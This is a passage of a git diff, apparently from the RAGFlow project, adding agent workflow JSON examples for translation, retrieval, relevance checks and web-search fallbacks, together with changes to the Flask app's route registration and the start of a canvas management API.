"temperature": 0.1,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["categorize:1"]
|
||||
},
|
||||
"message:reject": {
|
||||
"obj": {
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"好的,祝您生活愉快,工作顺利。",
|
||||
"哦,好的,感谢您宝贵的时间!"
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"path": [],
|
||||
"reference": [],
|
||||
"answer": []
|
||||
}
|
||||
39
agent/test/dsl_examples/intergreper.json
Normal file
39
agent/test/dsl_examples/intergreper.json
Normal file
@ -0,0 +1,39 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["begin", "generate:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an professional interpreter.\n- Role: an professional interpreter.\n- Input format: content need to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
|
||||
"temperature": 0.5
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["answer:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
39
agent/test/dsl_examples/interpreter.json
Normal file
39
agent/test/dsl_examples/interpreter.json
Normal file
@ -0,0 +1,39 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["begin", "generate:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an professional interpreter.\n- Role: an professional interpreter.\n- Input format: content need to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
|
||||
"temperature": 0.5
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["answer:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
62
agent/test/dsl_examples/keyword_wikipedia_and_generate.json
Normal file
62
agent/test/dsl_examples/keyword_wikipedia_and_generate.json
Normal file
@ -0,0 +1,62 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["keyword:0"],
|
||||
"upstream": ["begin"]
|
||||
},
|
||||
"keyword:0": {
|
||||
"obj": {
|
||||
"component_name": "KeywordExtract",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
|
||||
"temperature": 0.2,
|
||||
"top_n": 1
|
||||
}
|
||||
},
|
||||
"downstream": ["wikipedia:0"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"wikipedia:0": {
|
||||
"obj":{
|
||||
"component_name": "Wikipedia",
|
||||
"params": {
|
||||
"top_n": 10
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["keyword:0"]
|
||||
},
|
||||
"generate:1": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please answer the question based on content from Wikipedia. When the answer from Wikipedia is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Wikipedia is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Wikipedia!\". Answers need to consider chat history.\n The content of Wikipedia is as follows:\n {input}\n The above is the content of Wikipedia.",
|
||||
"temperature": 0.2
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["wikipedia:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"path": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"answer": []
|
||||
}
|
||||
54
agent/test/dsl_examples/retrieval_and_generate.json
Normal file
54
agent/test/dsl_examples/retrieval_and_generate.json
Normal file
@ -0,0 +1,54 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["retrieval:0"],
|
||||
"upstream": ["begin", "generate:0"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"]
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
|
||||
"temperature": 0.2
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["retrieval:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
@ -0,0 +1,88 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:0"],
|
||||
"upstream": ["begin", "generate:0", "switch:0"]
|
||||
},
|
||||
"categorize:0": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"product_related": {
|
||||
"description": "The question is about the product usage, appearance and how it works.",
|
||||
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
|
||||
"to": "retrieval:0"
|
||||
},
|
||||
"others": {
|
||||
"description": "The question is not about the product usage, appearance and how it works.",
|
||||
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
|
||||
"to": "message:0"
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"downstream": ["retrieval:0", "message:0"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"message:0": {
|
||||
"obj":{
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"Sorry, I don't know. I'm an AI bot."
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"]
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["switch:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
|
||||
"temperature": 0.2
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["retrieval:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
82
agent/test/dsl_examples/retrieval_relevant_and_generate.json
Normal file
82
agent/test/dsl_examples/retrieval_relevant_and_generate.json
Normal file
@ -0,0 +1,82 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["retrieval:0"],
|
||||
"upstream": ["begin", "generate:0", "switch:0"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"],
|
||||
"empty_response": "Sorry, knowledge base has noting related information."
|
||||
}
|
||||
},
|
||||
"downstream": ["relevant:0"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"relevant:0": {
|
||||
"obj": {
|
||||
"component_name": "Relevant",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"temperature": 0.02,
|
||||
"yes": "generate:0",
|
||||
"no": "message:0"
|
||||
}
|
||||
},
|
||||
"downstream": ["message:0", "generate:0"],
|
||||
"upstream": ["retrieval:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
|
||||
"temperature": 0.2
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
},
|
||||
"message:0": {
|
||||
"obj":{
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"Sorry, I don't know. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
|
||||
"I'm an AI bot and not quite sure about this question. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
|
||||
"Can't find answer in my knowledge base. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?"
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"path": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"answer": []
|
||||
}
|
||||
@ -0,0 +1,103 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["retrieval:0"],
|
||||
"upstream": ["begin"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["21ca4e6a2c8911ef8b1e0242ac120006"],
|
||||
"empty_response": "Sorry, knowledge base has noting related information."
|
||||
}
|
||||
},
|
||||
"downstream": ["relevant:0"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"relevant:0": {
|
||||
"obj": {
|
||||
"component_name": "Relevant",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"temperature": 0.02,
|
||||
"yes": "generate:0",
|
||||
"no": "keyword:0"
|
||||
}
|
||||
},
|
||||
"downstream": ["keyword:0", "generate:0"],
|
||||
"upstream": ["retrieval:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
|
||||
"temperature": 0.2
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
},
|
||||
"keyword:0": {
|
||||
"obj": {
|
||||
"component_name": "KeywordExtract",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
|
||||
"temperature": 0.2,
|
||||
"top_n": 1
|
||||
}
|
||||
},
|
||||
"downstream": ["baidu:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
},
|
||||
"baidu:0": {
|
||||
"obj":{
|
||||
"component_name": "Baidu",
|
||||
"params": {
|
||||
"top_n": 10
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:1"],
|
||||
"upstream": ["keyword:0"]
|
||||
},
|
||||
"generate:1": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please answer the question based on content searched from Baidu. When the answer from a Baidu search is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Baidu is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Baidu search!\". Answers need to consider chat history.\n The content of Baidu search is as follows:\n {input}\n The above is the content of Baidu search.",
|
||||
"temperature": 0.2
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["baidu:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"path": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"answer": []
|
||||
}
|
||||
@ -0,0 +1,79 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["retrieval:0"],
|
||||
"upstream": ["begin", "generate:0", "switch:0"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"],
|
||||
"empty_response": "Sorry, knowledge base has noting related information."
|
||||
}
|
||||
},
|
||||
"downstream": ["relevant:0"],
|
||||
"upstream": ["answer:0", "rewrite:0"]
|
||||
},
|
||||
"relevant:0": {
|
||||
"obj": {
|
||||
"component_name": "Relevant",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"temperature": 0.02,
|
||||
"yes": "generate:0",
|
||||
"no": "rewrite:0"
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:0", "rewrite:0"],
|
||||
"upstream": ["retrieval:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
|
||||
"temperature": 0.02
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
},
|
||||
"rewrite:0": {
|
||||
"obj":{
|
||||
"component_name": "RewriteQuestion",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"temperature": 0.8
|
||||
}
|
||||
},
|
||||
"downstream": ["retrieval:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"path": [],
|
||||
"reference": [],
|
||||
"answer": []
|
||||
}
|
||||
@ -1,120 +1,126 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import logging
|
||||
import os
|
||||
import sys
|
||||
from importlib.util import module_from_spec, spec_from_file_location
|
||||
from pathlib import Path
|
||||
from flask import Blueprint, Flask
|
||||
from werkzeug.wrappers.request import Request
|
||||
from flask_cors import CORS
|
||||
|
||||
from api.db import StatusEnum
|
||||
from api.db.db_models import close_connection
|
||||
from api.db.services import UserService
|
||||
from api.utils import CustomJSONEncoder
|
||||
|
||||
from flask_session import Session
|
||||
from flask_login import LoginManager
|
||||
from api.settings import SECRET_KEY, stat_logger
|
||||
from api.settings import API_VERSION, access_logger
|
||||
from api.utils.api_utils import server_error_response
|
||||
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer
|
||||
|
||||
__all__ = ['app']
|
||||
|
||||
|
||||
logger = logging.getLogger('flask.app')
|
||||
for h in access_logger.handlers:
|
||||
logger.addHandler(h)
|
||||
|
||||
Request.json = property(lambda self: self.get_json(force=True, silent=True))
|
||||
|
||||
app = Flask(__name__)
|
||||
CORS(app, supports_credentials=True,max_age=2592000)
|
||||
app.url_map.strict_slashes = False
|
||||
app.json_encoder = CustomJSONEncoder
|
||||
app.errorhandler(Exception)(server_error_response)
|
||||
|
||||
|
||||
## convince for dev and debug
|
||||
#app.config["LOGIN_DISABLED"] = True
|
||||
app.config["SESSION_PERMANENT"] = False
|
||||
app.config["SESSION_TYPE"] = "filesystem"
|
||||
app.config['MAX_CONTENT_LENGTH'] = int(os.environ.get("MAX_CONTENT_LENGTH", 128 * 1024 * 1024))
|
||||
|
||||
Session(app)
|
||||
login_manager = LoginManager()
|
||||
login_manager.init_app(app)
|
||||
|
||||
|
||||
|
||||
def search_pages_path(pages_dir):
|
||||
return [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
|
||||
|
||||
|
||||
def register_page(page_path):
|
||||
page_name = page_path.stem.rstrip('_app')
|
||||
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name, ))
|
||||
|
||||
spec = spec_from_file_location(module_name, page_path)
|
||||
page = module_from_spec(spec)
|
||||
page.app = app
|
||||
page.manager = Blueprint(page_name, module_name)
|
||||
sys.modules[module_name] = page
|
||||
spec.loader.exec_module(page)
|
||||
|
||||
page_name = getattr(page, 'page_name', page_name)
|
||||
url_prefix = f'/{API_VERSION}/{page_name}'
|
||||
|
||||
app.register_blueprint(page.manager, url_prefix=url_prefix)
|
||||
return url_prefix
|
||||
|
||||
|
||||
pages_dir = [
|
||||
Path(__file__).parent,
|
||||
Path(__file__).parent.parent / 'api' / 'apps',
|
||||
]
|
||||
|
||||
client_urls_prefix = [
|
||||
register_page(path)
|
||||
for dir in pages_dir
|
||||
for path in search_pages_path(dir)
|
||||
]
|
||||
|
||||
|
||||
@login_manager.request_loader
|
||||
def load_user(web_request):
|
||||
jwt = Serializer(secret_key=SECRET_KEY)
|
||||
authorization = web_request.headers.get("Authorization")
|
||||
if authorization:
|
||||
try:
|
||||
access_token = str(jwt.loads(authorization))
|
||||
user = UserService.query(access_token=access_token, status=StatusEnum.VALID.value)
|
||||
if user:
|
||||
return user[0]
|
||||
else:
|
||||
return None
|
||||
except Exception as e:
|
||||
stat_logger.exception(e)
|
||||
return None
|
||||
else:
|
||||
return None
|
||||
|
||||
|
||||
@app.teardown_request
|
||||
def _db_close(exc):
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import logging
|
||||
import os
|
||||
import sys
|
||||
from importlib.util import module_from_spec, spec_from_file_location
|
||||
from pathlib import Path
|
||||
from flask import Blueprint, Flask
|
||||
from werkzeug.wrappers.request import Request
|
||||
from flask_cors import CORS
|
||||
|
||||
from api.db import StatusEnum
|
||||
from api.db.db_models import close_connection
|
||||
from api.db.services import UserService
|
||||
from api.utils import CustomJSONEncoder, commands
|
||||
|
||||
from flask_session import Session
|
||||
from flask_login import LoginManager
|
||||
from api.settings import SECRET_KEY, stat_logger
|
||||
from api.settings import API_VERSION, access_logger
|
||||
from api.utils.api_utils import server_error_response
|
||||
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer
|
||||
|
||||
__all__ = ['app']
|
||||
|
||||
|
||||
logger = logging.getLogger('flask.app')
|
||||
for h in access_logger.handlers:
|
||||
logger.addHandler(h)
|
||||
|
||||
Request.json = property(lambda self: self.get_json(force=True, silent=True))
|
||||
|
||||
app = Flask(__name__)
|
||||
CORS(app, supports_credentials=True,max_age=2592000)
|
||||
app.url_map.strict_slashes = False
|
||||
app.json_encoder = CustomJSONEncoder
|
||||
app.errorhandler(Exception)(server_error_response)
|
||||
|
||||
|
||||
## convince for dev and debug
|
||||
#app.config["LOGIN_DISABLED"] = True
|
||||
app.config["SESSION_PERMANENT"] = False
|
||||
app.config["SESSION_TYPE"] = "filesystem"
|
||||
app.config['MAX_CONTENT_LENGTH'] = int(os.environ.get("MAX_CONTENT_LENGTH", 128 * 1024 * 1024))
|
||||
|
||||
Session(app)
|
||||
login_manager = LoginManager()
|
||||
login_manager.init_app(app)
|
||||
|
||||
commands.register_commands(app)
|
||||
|
||||
|
||||
def search_pages_path(pages_dir):
|
||||
app_path_list = [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
|
||||
api_path_list = [path for path in pages_dir.glob('*sdk/*.py') if not path.name.startswith('.')]
|
||||
app_path_list.extend(api_path_list)
|
||||
return app_path_list
|
||||
|
||||
|
||||
def register_page(page_path):
|
||||
path = f'{page_path}'
|
||||
|
||||
page_name = page_path.stem.rstrip('_app')
|
||||
module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name,))
|
||||
|
||||
spec = spec_from_file_location(module_name, page_path)
|
||||
page = module_from_spec(spec)
|
||||
page.app = app
|
||||
page.manager = Blueprint(page_name, module_name)
|
||||
sys.modules[module_name] = page
|
||||
spec.loader.exec_module(page)
|
||||
page_name = getattr(page, 'page_name', page_name)
|
||||
url_prefix = f'/api/{API_VERSION}/{page_name}' if "/sdk/" in path else f'/{API_VERSION}/{page_name}'
|
||||
|
||||
app.register_blueprint(page.manager, url_prefix=url_prefix)
|
||||
return url_prefix
|
||||
|
||||
|
||||
pages_dir = [
|
||||
Path(__file__).parent,
|
||||
Path(__file__).parent.parent / 'api' / 'apps',
|
||||
Path(__file__).parent.parent / 'api' / 'apps' / 'sdk',
|
||||
]
|
||||
|
||||
client_urls_prefix = [
|
||||
register_page(path)
|
||||
for dir in pages_dir
|
||||
for path in search_pages_path(dir)
|
||||
]
|
||||
|
||||
|
||||
@login_manager.request_loader
|
||||
def load_user(web_request):
|
||||
jwt = Serializer(secret_key=SECRET_KEY)
|
||||
authorization = web_request.headers.get("Authorization")
|
||||
if authorization:
|
||||
try:
|
||||
access_token = str(jwt.loads(authorization))
|
||||
user = UserService.query(access_token=access_token, status=StatusEnum.VALID.value)
|
||||
if user:
|
||||
return user[0]
|
||||
else:
|
||||
return None
|
||||
except Exception as e:
|
||||
stat_logger.exception(e)
|
||||
return None
|
||||
else:
|
||||
return None
|
||||
|
||||
|
||||
@app.teardown_request
|
||||
def _db_close(exc):
|
||||
close_connection()
|
||||
1181
api/apps/api_app.py
1181
api/apps/api_app.py
File diff suppressed because it is too large
Load Diff
197
api/apps/canvas_app.py
Normal file
197
api/apps/canvas_app.py
Normal file
@ -0,0 +1,197 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
from functools import partial
|
||||
from flask import request, Response
|
||||
from flask_login import login_required, current_user
|
||||
from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService
|
||||
from api.settings import RetCode
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result, server_error_response, validate_request, get_data_error_result
|
||||
from agent.canvas import Canvas
|
||||
from peewee import MySQLDatabase, PostgresqlDatabase
|
||||
|
||||
|
||||
@manager.route('/templates', methods=['GET'])
|
||||
@login_required
|
||||
def templates():
|
||||
return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def canvas_list():
|
||||
return get_json_result(data=sorted([c.to_dict() for c in \
|
||||
UserCanvasService.query(user_id=current_user.id)], key=lambda x: x["update_time"]*-1)
|
||||
)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@validate_request("canvas_ids")
|
||||
@login_required
|
||||
def rm():
|
||||
for i in request.json["canvas_ids"]:
|
||||
if not UserCanvasService.query(user_id=current_user.id,id=i):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of canvas authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
UserCanvasService.delete_by_id(i)
|
